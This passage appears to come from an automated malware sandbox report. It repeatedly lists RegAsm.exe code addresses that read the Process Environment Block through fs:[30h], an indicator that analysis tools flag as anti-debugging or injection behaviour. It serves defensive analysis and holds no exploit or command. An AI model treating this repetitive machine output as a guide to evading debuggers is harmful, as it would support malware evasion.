Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D4000 mov ecx, dword ptr fs:[00000030h]	7_2_033D4000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033F2000 mov eax, dword ptr fs:[00000030h]	7_2_033F2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033F2000 mov eax, dword ptr fs:[00000030h]	7_2_033F2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033F2000 mov eax, dword ptr fs:[00000030h]	7_2_033F2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033F2000 mov eax, dword ptr fs:[00000030h]	7_2_033F2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033F2000 mov eax, dword ptr fs:[00000030h]	7_2_033F2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033F2000 mov eax, dword ptr fs:[00000030h]	7_2_033F2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033F2000 mov eax, dword ptr fs:[00000030h]	7_2_033F2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033F2000 mov eax, dword ptr fs:[00000030h]	7_2_033F2000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0337C073 mov eax, dword ptr fs:[00000030h]	7_2_0337C073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03352050 mov eax, dword ptr fs:[00000030h]	7_2_03352050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D6050 mov eax, dword ptr fs:[00000030h]	7_2_033D6050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033480A0 mov eax, dword ptr fs:[00000030h]	7_2_033480A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033E80A8 mov eax, dword ptr fs:[00000030h]	7_2_033E80A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0335208A mov eax, dword ptr fs:[00000030h]	7_2_0335208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0334C0F0 mov eax, dword ptr fs:[00000030h]	7_2_0334C0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033920F0 mov ecx, dword ptr fs:[00000030h]	7_2_033920F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0334A0E3 mov ecx, dword ptr fs:[00000030h]	7_2_0334A0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033580E9 mov eax, dword ptr fs:[00000030h]	7_2_033580E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D60E0 mov eax, dword ptr fs:[00000030h]	7_2_033D60E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D20DE mov eax, dword ptr fs:[00000030h]	7_2_033D20DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_034160B8 mov eax, dword ptr fs:[00000030h]	7_2_034160B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_034160B8 mov ecx, dword ptr fs:[00000030h]	7_2_034160B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338273C mov eax, dword ptr fs:[00000030h]	7_2_0338273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338273C mov ecx, dword ptr fs:[00000030h]	7_2_0338273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338273C mov eax, dword ptr fs:[00000030h]	7_2_0338273C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033CC730 mov eax, dword ptr fs:[00000030h]	7_2_033CC730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338C720 mov eax, dword ptr fs:[00000030h]	7_2_0338C720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338C720 mov eax, dword ptr fs:[00000030h]	7_2_0338C720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03350710 mov eax, dword ptr fs:[00000030h]	7_2_03350710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03380710 mov eax, dword ptr fs:[00000030h]	7_2_03380710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338C700 mov eax, dword ptr fs:[00000030h]	7_2_0338C700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03358770 mov eax, dword ptr fs:[00000030h]	7_2_03358770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03360770 mov eax, dword ptr fs:[00000030h]	7_2_03360770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03360770 mov eax, dword ptr fs:[00000030h]	7_2_03360770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03360770 mov eax, dword ptr fs:[00000030h]	7_2_03360770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03360770 mov eax, dword ptr fs:[00000030h]	7_2_03360770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03360770 mov eax, dword ptr fs:[00000030h]	7_2_03360770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03360770 mov eax, dword ptr fs:[00000030h]	7_2_03360770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03360770 mov eax, dword ptr fs:[00000030h]	7_2_03360770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03360770 mov eax, dword ptr fs:[00000030h]	7_2_03360770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03360770 mov eax, dword ptr fs:[00000030h]	7_2_03360770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03360770 mov eax, dword ptr fs:[00000030h]	7_2_03360770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03360770 mov eax, dword ptr fs:[00000030h]	7_2_03360770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03360770 mov eax, dword ptr fs:[00000030h]	7_2_03360770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033DE75D mov eax, dword ptr fs:[00000030h]	7_2_033DE75D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03350750 mov eax, dword ptr fs:[00000030h]	7_2_03350750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D4755 mov eax, dword ptr fs:[00000030h]	7_2_033D4755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03392750 mov eax, dword ptr fs:[00000030h]	7_2_03392750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03392750 mov eax, dword ptr fs:[00000030h]	7_2_03392750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338674D mov esi, dword ptr fs:[00000030h]	7_2_0338674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338674D mov eax, dword ptr fs:[00000030h]	7_2_0338674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338674D mov eax, dword ptr fs:[00000030h]	7_2_0338674D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033507AF mov eax, dword ptr fs:[00000030h]	7_2_033507AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033F678E mov eax, dword ptr fs:[00000030h]	7_2_033F678E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033547FB mov eax, dword ptr fs:[00000030h]	7_2_033547FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033547FB mov eax, dword ptr fs:[00000030h]	7_2_033547FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033727ED mov eax, dword ptr fs:[00000030h]	7_2_033727ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033727ED mov eax, dword ptr fs:[00000030h]	7_2_033727ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033727ED mov eax, dword ptr fs:[00000030h]	7_2_033727ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033DE7E1 mov eax, dword ptr fs:[00000030h]	7_2_033DE7E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_034047A0 mov eax, dword ptr fs:[00000030h]	7_2_034047A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0335C7C0 mov eax, dword ptr fs:[00000030h]	7_2_0335C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D07C3 mov eax, dword ptr fs:[00000030h]	7_2_033D07C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0336E627 mov eax, dword ptr fs:[00000030h]	7_2_0336E627
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03386620 mov eax, dword ptr fs:[00000030h]	7_2_03386620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03388620 mov eax, dword ptr fs:[00000030h]	7_2_03388620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0335262C mov eax, dword ptr fs:[00000030h]	7_2_0335262C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03392619 mov eax, dword ptr fs:[00000030h]	7_2_03392619
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0341866E mov eax, dword ptr fs:[00000030h]	7_2_0341866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0341866E mov eax, dword ptr fs:[00000030h]	7_2_0341866E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033CE609 mov eax, dword ptr fs:[00000030h]	7_2_033CE609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0336260B mov eax, dword ptr fs:[00000030h]	7_2_0336260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0336260B mov eax, dword ptr fs:[00000030h]	7_2_0336260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0336260B mov eax, dword ptr fs:[00000030h]	7_2_0336260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0336260B mov eax, dword ptr fs:[00000030h]	7_2_0336260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0336260B mov eax, dword ptr fs:[00000030h]	7_2_0336260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0336260B mov eax, dword ptr fs:[00000030h]	7_2_0336260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0336260B mov eax, dword ptr fs:[00000030h]	7_2_0336260B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03382674 mov eax, dword ptr fs:[00000030h]	7_2_03382674
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338A660 mov eax, dword ptr fs:[00000030h]	7_2_0338A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338A660 mov eax, dword ptr fs:[00000030h]	7_2_0338A660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0336C640 mov eax, dword ptr fs:[00000030h]	7_2_0336C640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033866B0 mov eax, dword ptr fs:[00000030h]	7_2_033866B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338C6A6 mov eax, dword ptr fs:[00000030h]	7_2_0338C6A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03354690 mov eax, dword ptr fs:[00000030h]	7_2_03354690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03354690 mov eax, dword ptr fs:[00000030h]	7_2_03354690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D06F1 mov eax, dword ptr fs:[00000030h]	7_2_033D06F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D06F1 mov eax, dword ptr fs:[00000030h]	7_2_033D06F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033CE6F2 mov eax, dword ptr fs:[00000030h]	7_2_033CE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033CE6F2 mov eax, dword ptr fs:[00000030h]	7_2_033CE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033CE6F2 mov eax, dword ptr fs:[00000030h]	7_2_033CE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033CE6F2 mov eax, dword ptr fs:[00000030h]	7_2_033CE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338A6C7 mov ebx, dword ptr fs:[00000030h]	7_2_0338A6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338A6C7 mov eax, dword ptr fs:[00000030h]	7_2_0338A6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03360535 mov eax, dword ptr fs:[00000030h]	7_2_03360535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03360535 mov eax, dword ptr fs:[00000030h]	7_2_03360535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03360535 mov eax, dword ptr fs:[00000030h]	7_2_03360535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03360535 mov eax, dword ptr fs:[00000030h]	7_2_03360535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03360535 mov eax, dword ptr fs:[00000030h]	7_2_03360535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03360535 mov eax, dword ptr fs:[00000030h]	7_2_03360535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0337E53E mov eax, dword ptr fs:[00000030h]	7_2_0337E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0337E53E mov eax, dword ptr fs:[00000030h]	7_2_0337E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0337E53E mov eax, dword ptr fs:[00000030h]	7_2_0337E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0337E53E mov eax, dword ptr fs:[00000030h]	7_2_0337E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0337E53E mov eax, dword ptr fs:[00000030h]	7_2_0337E53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033E6500 mov eax, dword ptr fs:[00000030h]	7_2_033E6500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03424500 mov eax, dword ptr fs:[00000030h]	7_2_03424500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03424500 mov eax, dword ptr fs:[00000030h]	7_2_03424500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03424500 mov eax, dword ptr fs:[00000030h]	7_2_03424500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03424500 mov eax, dword ptr fs:[00000030h]	7_2_03424500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03424500 mov eax, dword ptr fs:[00000030h]	7_2_03424500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03424500 mov eax, dword ptr fs:[00000030h]	7_2_03424500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03424500 mov eax, dword ptr fs:[00000030h]	7_2_03424500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338656A mov eax, dword ptr fs:[00000030h]	7_2_0338656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338656A mov eax, dword ptr fs:[00000030h]	7_2_0338656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338656A mov eax, dword ptr fs:[00000030h]	7_2_0338656A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03358550 mov eax, dword ptr fs:[00000030h]	7_2_03358550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03358550 mov eax, dword ptr fs:[00000030h]	7_2_03358550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033745B1 mov eax, dword ptr fs:[00000030h]	7_2_033745B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033745B1 mov eax, dword ptr fs:[00000030h]	7_2_033745B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D05A7 mov eax, dword ptr fs:[00000030h]	7_2_033D05A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D05A7 mov eax, dword ptr fs:[00000030h]	7_2_033D05A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D05A7 mov eax, dword ptr fs:[00000030h]	7_2_033D05A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338E59C mov eax, dword ptr fs:[00000030h]	7_2_0338E59C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03384588 mov eax, dword ptr fs:[00000030h]	7_2_03384588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03352582 mov eax, dword ptr fs:[00000030h]	7_2_03352582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03352582 mov ecx, dword ptr fs:[00000030h]	7_2_03352582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0337E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0337E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0337E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0337E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0337E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0337E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0337E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0337E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0337E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0337E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0337E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0337E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0337E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0337E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0337E5E7 mov eax, dword ptr fs:[00000030h]	7_2_0337E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033525E0 mov eax, dword ptr fs:[00000030h]	7_2_033525E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338C5ED mov eax, dword ptr fs:[00000030h]	7_2_0338C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338C5ED mov eax, dword ptr fs:[00000030h]	7_2_0338C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033565D0 mov eax, dword ptr fs:[00000030h]	7_2_033565D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338A5D0 mov eax, dword ptr fs:[00000030h]	7_2_0338A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338A5D0 mov eax, dword ptr fs:[00000030h]	7_2_0338A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338E5CF mov eax, dword ptr fs:[00000030h]	7_2_0338E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338E5CF mov eax, dword ptr fs:[00000030h]	7_2_0338E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338A430 mov eax, dword ptr fs:[00000030h]	7_2_0338A430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0334C427 mov eax, dword ptr fs:[00000030h]	7_2_0334C427
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0334E420 mov eax, dword ptr fs:[00000030h]	7_2_0334E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0334E420 mov eax, dword ptr fs:[00000030h]	7_2_0334E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0334E420 mov eax, dword ptr fs:[00000030h]	7_2_0334E420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0340A456 mov eax, dword ptr fs:[00000030h]	7_2_0340A456
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D6420 mov eax, dword ptr fs:[00000030h]	7_2_033D6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D6420 mov eax, dword ptr fs:[00000030h]	7_2_033D6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D6420 mov eax, dword ptr fs:[00000030h]	7_2_033D6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D6420 mov eax, dword ptr fs:[00000030h]	7_2_033D6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D6420 mov eax, dword ptr fs:[00000030h]	7_2_033D6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D6420 mov eax, dword ptr fs:[00000030h]	7_2_033D6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033D6420 mov eax, dword ptr fs:[00000030h]	7_2_033D6420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03388402 mov eax, dword ptr fs:[00000030h]	7_2_03388402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03388402 mov eax, dword ptr fs:[00000030h]	7_2_03388402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_03388402 mov eax, dword ptr fs:[00000030h]	7_2_03388402
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0337A470 mov eax, dword ptr fs:[00000030h]	7_2_0337A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0337A470 mov eax, dword ptr fs:[00000030h]	7_2_0337A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0337A470 mov eax, dword ptr fs:[00000030h]	7_2_0337A470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033DC460 mov ecx, dword ptr fs:[00000030h]	7_2_033DC460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0334645D mov eax, dword ptr fs:[00000030h]	7_2_0334645D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0337245A mov eax, dword ptr fs:[00000030h]	7_2_0337245A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338E443 mov eax, dword ptr fs:[00000030h]	7_2_0338E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338E443 mov eax, dword ptr fs:[00000030h]	7_2_0338E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338E443 mov eax, dword ptr fs:[00000030h]	7_2_0338E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338E443 mov eax, dword ptr fs:[00000030h]	7_2_0338E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338E443 mov eax, dword ptr fs:[00000030h]	7_2_0338E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338E443 mov eax, dword ptr fs:[00000030h]	7_2_0338E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338E443 mov eax, dword ptr fs:[00000030h]	7_2_0338E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0338E443 mov eax, dword ptr fs:[00000030h]	7_2_0338E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033844B0 mov ecx, dword ptr fs:[00000030h]	7_2_033844B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033DA4B0 mov eax, dword ptr fs:[00000030h]	7_2_033DA4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033564AB mov eax, dword ptr fs:[00000030h]	7_2_033564AB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_033504E5 mov ecx, dword ptr fs:[00000030h]	7_2_033504E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0340A49A mov eax, dword ptr fs:[00000030h]	7_2_0340A49A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_0341AB40 mov eax, dword ptr fs:[00000030h]	7_2_0341AB40
